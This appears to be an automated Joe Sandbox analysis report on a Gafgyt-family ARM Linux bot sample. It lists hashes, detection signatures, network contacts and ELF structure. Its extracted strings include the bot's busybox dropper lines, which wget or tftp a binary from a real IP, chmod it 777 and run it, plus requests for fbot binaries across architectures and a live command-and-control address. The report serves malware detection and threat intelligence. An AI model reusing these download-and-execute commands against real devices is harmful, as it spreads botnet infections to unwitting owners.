Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm.elf

Overview

General Information

Sample name:arm.elf
Analysis ID:1559718
MD5:3f45dc3fdc50d2412dd299a4190fcccc
SHA1:fe7dddb80fbbf9c1ca71594b88db74aa5282e72a
SHA256:0b13e408e08c89bac6dc47950aa5faa030c095b439da4d9e31842dceb70db52b
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Detected TCP or UDP traffic on non-standard ports
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1559718
Start date and time:2024-11-20 21:07:12 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm.elf
Detection:MAL
Classification:mal48.linELF@0/0@2/0
  • VT rate limit hit for: arm.elf
Command:/tmp/arm.elf
PID:5428
Exit Code:1
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • dash New Fork (PID: 5416, Parent: 3583)
  • rm (PID: 5416, Parent: 3583, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
  • dash New Fork (PID: 5417, Parent: 3583)
  • rm (PID: 5417, Parent: 3583, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
  • arm.elf (PID: 5428, Parent: 5349, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm.elf
    • arm.elf New Fork (PID: 5430, Parent: 5428)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm.elfReversingLabs: Detection: 42%
Source: global trafficTCP traffic: 192.168.2.13:46006 -> 85.239.34.134:7685
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownTCP traffic detected without corresponding DNS query: 85.239.34.134
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: arm.elfString found in binary or memory: Cdh5GZtVWYhl2cuFGdz9mLsNWdAIiZh5GZtVWYhl2cuFGdz9mLsNWdAI2Zz9Ca0BGa0FGI0lWYpxWYg4mZtFWa5xGI0FHIoRSZuBXZ0hHIhRmYlxHI1NmcgUXagMXcpVXZAQhttps://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789unknown./. equals www.youtube.com (Youtube)
Source: arm.elfString found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: arm.elfString found in binary or memory: http://87.120.116.226
Source: arm.elfString found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjY
Source: arm.elfString found in binary or memory: https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZ
Source: Initial sampleString containing 'busybox' found: /bin/busybox TSUNAMI
Source: Initial sampleString containing 'busybox' found: /bin/busybox cat /bin/busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sampleString containing 'busybox' found: /bin/busybox KSLAKW; /bin/busybox wget; /bin/busybox tftp; /bin/busybox echo
Source: Initial sampleString containing 'busybox' found: pdlbwairmoheqc18k5fgstv4jn072u63\x%02x2bpdgbAAgOAA2cyVmbtFQZAAndkJndAMXYzN2dy9AZAA2YvNWd05iOhBHcsBXZgQmb09GIvZWdk5gPAAAJAAwIAAnYzVWevJAeAAXbsVGdtk2YsFAbAAGasVAcAAmbvNnclJ3YAQnbhZGbklWYslWZAQWZp5WZAQncvJgcAA2bk9nYllmYkFURGx2dldDdgoXYwBGb0VGIv5CdmB3buVAZAAGd0ZDcgoXYwBGb0VGIv5CdmB3buVAZAAURIN0TPRkTAUenablesystemshellshlinuxshell/bin/busybox TSUNAMI/bin/busybox cat /bin/busybox
Source: Initial sampleString containing 'busybox' found: >t && cd && >retrieve; >.t/bin/busybox cp /bin/busybox retrieve && >retrieve && /bin/busybox chmod 777 retrieve && /bin/busybox cp /bin/busybox .t && >.t && /bin/busybox chmod 777 .t
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: -O -> .t; /bin/busybox chmod 777 .t; ./.t
Source: Initial sampleString containing 'busybox' found: /bin/busybox tftp -r
Source: Initial sampleString containing 'busybox' found: ; /bin/busybox chmod 777 .t; ./.t
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -en '
Source: Initial sampleString containing 'busybox' found: retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
Source: Initial sampleString containing 'busybox' found: ELFarmsparci686m68kpowerpcsuperhx86_64mipselmips/bin/busybox wget http://87.120.116.226 -O -> .t; /bin/busybox chmod 777 .t; ./.t/bin/busybox tftp -r -l .t -g ; /bin/busybox chmod 777 .t; ./.t/bin/busybox echo -en '' >> retrieve && /bin/busybox echo -en '\x45\x43\x48\x4f\x44\x4f\x4e\x45'./retrieve > .t && ./.t; >retrieve && >.t
Source: Initial samplePotential command found: GET /fbot.arm5 HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.arm7 HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.x86 HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.mips HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.mipsel HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.powerpc HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.sparc HTTP/1.0
Source: Initial samplePotential command found: GET /fbot.sh4 HTTP/1.0
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@2/0
Source: /usr/bin/dash (PID: 5416)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZpJump to behavior
Source: /usr/bin/dash (PID: 5417)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZpJump to behavior
Source: /tmp/arm.elf (PID: 5428)Queries kernel information via 'uname': Jump to behavior
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmpBinary or memory string: R |U!/etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmpBinary or memory string: :Cx86_64/usr/bin/qemu-arm/tmp/arm.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm.elf
Source: arm.elf, 5428.1.0000557c20512000.0000557c20640000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm.elf, 5428.1.00007ffda5f96000.00007ffda5fb7000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
Path InterceptionPath Interception1
File Deletion
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559718 Sample: arm.elf Startdate: 20/11/2024 Architecture: LINUX Score: 48 13 85.239.34.134, 46006, 7685 RAINBOW-HKRainbownetworklimitedHK Russian Federation 2->13 15 daisy.ubuntu.com 2->15 17 Multi AV Scanner detection for submitted file 2->17 7 dash rm arm.elf 2->7         started        9 dash rm 2->9         started        signatures3 process4 process5 11 arm.elf 7->11         started       
SourceDetectionScannerLabelLink
arm.elf42%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    https://www.youtube.ru/watch?v=OGp9P6QvMjYmb0V2dy9yai5Waid3bwRWZulmLvNQbAAABCDEFGHIJKLMNOPQRSTUVWXYZarm.elffalse
      high
      http://87.120.116.226arm.elffalse
        unknown
        https://www.youtube.ru/watch?v=OGp9P6QvMjYarm.elffalse
          high
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          85.239.34.134
          unknownRussian Federation
          134121RAINBOW-HKRainbownetworklimitedHKfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          85.239.34.134arm5.elfGet hashmaliciousUnknownBrowse
            mpsl.elfGet hashmaliciousUnknownBrowse
              ppc.elfGet hashmaliciousUnknownBrowse
                arm6.elfGet hashmaliciousUnknownBrowse
                  x86-20241120-0553.elfGet hashmaliciousUnknownBrowse
                    test.elfGet hashmaliciousUnknownBrowse
                      bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                        bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                          bin.armv7l.elfGet hashmaliciousMiraiBrowse
                            bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              daisy.ubuntu.commpsl.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              arm6.elfGet hashmaliciousMiraiBrowse
                              • 162.213.35.25
                              arm7.elfGet hashmaliciousMiraiBrowse
                              • 162.213.35.25
                              newmain.elfGet hashmaliciousConnectBackBrowse
                              • 162.213.35.25
                              la.bot.mips.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              la.bot.arm.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.24
                              la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.24
                              wheiuwa4.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              m68k.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.24
                              dvwkja7.elfGet hashmaliciousMiraiBrowse
                              • 162.213.35.24
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              RAINBOW-HKRainbownetworklimitedHKarm5.elfGet hashmaliciousUnknownBrowse
                              • 85.239.34.134
                              mpsl.elfGet hashmaliciousUnknownBrowse
                              • 85.239.34.134
                              ppc.elfGet hashmaliciousUnknownBrowse
                              • 85.239.34.134
                              arm6.elfGet hashmaliciousUnknownBrowse
                              • 85.239.34.134
                              x86-20241120-0553.elfGet hashmaliciousUnknownBrowse
                              • 85.239.34.134
                              setup.msiGet hashmaliciousScreenConnect ToolBrowse
                              • 85.239.34.190
                              uspr2uHV0H.ps1Get hashmaliciousUnknownBrowse
                              • 85.239.61.60
                              test.elfGet hashmaliciousUnknownBrowse
                              • 85.239.34.134
                              la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                              • 24.233.26.195
                              bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                              • 85.239.34.134
                              No context
                              No context
                              No created / dropped files found
                              File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                              Entropy (8bit):6.1039061278492985
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:arm.elf
                              File size:80'480 bytes
                              MD5:3f45dc3fdc50d2412dd299a4190fcccc
                              SHA1:fe7dddb80fbbf9c1ca71594b88db74aa5282e72a
                              SHA256:0b13e408e08c89bac6dc47950aa5faa030c095b439da4d9e31842dceb70db52b
                              SHA512:c1cacb5970083c8830d5199b098bfbc82a02efb5ed43740dab10d5c697fd695076b6a0b337e2d32e29643bb286adebf668a0e3fff2cd42d07c1c61506a68037a
                              SSDEEP:1536:keuZSI1H5DBavNs9VVh1FDeOhGKVDSVuHJvchh:c1avu7D1FDeOh5VDSVwchh
                              TLSH:DF734B46F8C19A52C6D195B6FB1E028E332653A8C1EF730799396F213BCF8961E3B544
                              File Content Preview:.ELF...a..........(.........4...X8......4. ...(......................5...5...............5..........D....&..........Q.td..................................-...L."....=..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                              ELF header

                              Class:ELF32
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:ARM
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:ARM - ABI
                              ABI Version:0
                              Entry Point Address:0x8190
                              Flags:0x202
                              ELF Header Size:52
                              Program Header Offset:52
                              Program Header Size:32
                              Number of Program Headers:3
                              Section Header Offset:79960
                              Section Header Size:40
                              Number of Section Headers:13
                              Header String Table Index:12
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x80940x940x180x00x6AX004
                              .textPROGBITS0x80b00xb00xf6980x00x6AX0016
                              .finiPROGBITS0x177480xf7480x140x00x6AX004
                              .rodataPROGBITS0x1775c0xf75c0x3e480x00x2A004
                              .eh_framePROGBITS0x1c5a40x135a40x40x00x3WA004
                              .ctorsPROGBITS0x1c5a80x135a80x80x00x3WA004
                              .dtorsPROGBITS0x1c5b00x135b00x80x00x3WA004
                              .jcrPROGBITS0x1c5b80x135b80x40x00x3WA004
                              .dataPROGBITS0x1c5bc0x135bc0x22c0x00x3WA004
                              .bssNOBITS0x1c7e80x137e80x245c0x00x3WA004
                              .ARM.attributesARM_ATTRIBUTES0x00x137e80x100x00x0001
                              .shstrtabSTRTAB0x00x137f80x5d0x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x80000x80000x135a40x135a46.13350x5R E0x1000.init .text .fini .rodata
                              LOAD0x135a40x1c5a40x1c5a40x2440x26a02.35110x6RW 0x1000.eh_frame .ctors .dtors .jcr .data .bss
                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2024 21:07:55.350924015 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:55.470731020 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:55.470796108 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:55.471731901 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:55.591468096 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:56.891577959 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:56.891618013 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:56.891638041 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:56.891654968 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:56.891671896 CET76854600685.239.34.134192.168.2.13
                              Nov 20, 2024 21:07:56.891930103 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:56.891930103 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:56.891930103 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:56.891930103 CET460067685192.168.2.1385.239.34.134
                              Nov 20, 2024 21:07:56.892673016 CET460067685192.168.2.1385.239.34.134
                              TimestampSource PortDest PortSource IPDest IP
                              Nov 20, 2024 21:10:41.138885975 CET3815553192.168.2.131.1.1.1
                              Nov 20, 2024 21:10:41.138952971 CET4568153192.168.2.131.1.1.1
                              Nov 20, 2024 21:10:41.362469912 CET53381551.1.1.1192.168.2.13
                              Nov 20, 2024 21:10:41.392388105 CET53456811.1.1.1192.168.2.13
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 20, 2024 21:10:41.138885975 CET192.168.2.131.1.1.10x6a45Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                              Nov 20, 2024 21:10:41.138952971 CET192.168.2.131.1.1.10xd8e2Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 20, 2024 21:10:41.362469912 CET1.1.1.1192.168.2.130x6a45No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                              Nov 20, 2024 21:10:41.362469912 CET1.1.1.1192.168.2.130x6a45No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

                              System Behavior

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/dash
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/rm
                              Arguments:rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/dash
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):20:07:46
                              Start date (UTC):20/11/2024
                              Path:/usr/bin/rm
                              Arguments:rm -f /tmp/tmp.A0DVW5CD1Y /tmp/tmp.mDfWdf8Ovw /tmp/tmp.wEGxSmEwZp
                              File size:72056 bytes
                              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                              Start time (UTC):20:07:54
                              Start date (UTC):20/11/2024
                              Path:/tmp/arm.elf
                              Arguments:/tmp/arm.elf
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):20:07:54
                              Start date (UTC):20/11/2024
                              Path:/tmp/arm.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1